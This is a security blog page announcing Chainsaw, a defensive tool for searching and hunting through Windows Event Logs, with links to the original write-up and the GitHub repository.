Securehat
@FranticTyping
Search
⌃
K
Links
Blog Overview
💣
CobaltStrike
Cobalt Strike Staging and Extracting Configuration Information
Fighting Back Against Cobalt Strike - Detection Ideas
🔬
Malware Analysis
Tool-Less Extraction of IOCs from an Emotet Maldoc
Extracting the Cobalt Strike Config from a TEARDROP Loader
💉
Process Injection and Similar Topics
Shellcode Execution via EnumSystemLocalA
Manually Implementing Inline Function Hooking
Detecting Process Injection using Microsoft Detour Hooks
🔍
Detection Experiments
Detecting Parent Process Spoofing using KrabsETW
Chainsaw Tool - Search and Hunt Through Event Logs
Hunting for C3 Activity
📘
High Level Blue Team Topics
Scaling Detection and Response Operations
Powered By
GitBook
Comment on page
Chainsaw Tool - Search and Hunt Through Event Logs
A few months ago I wrote a tool in my day job that helps analysts to search and hunt through Windows Event Logs. The relevant blog post and tool links are below.
Original Blog Post
Chainsaw
F-Secure Labs
Github Page
GitHub - countercept/chainsaw: Rapidly Search and Hunt through Windows Event Logs
GitHub
Detection Experiments - Previous
Detecting Parent Process Spoofing using KrabsETW
Next - Detection Experiments
Hunting for C3 Activity
Last modified
2yr ago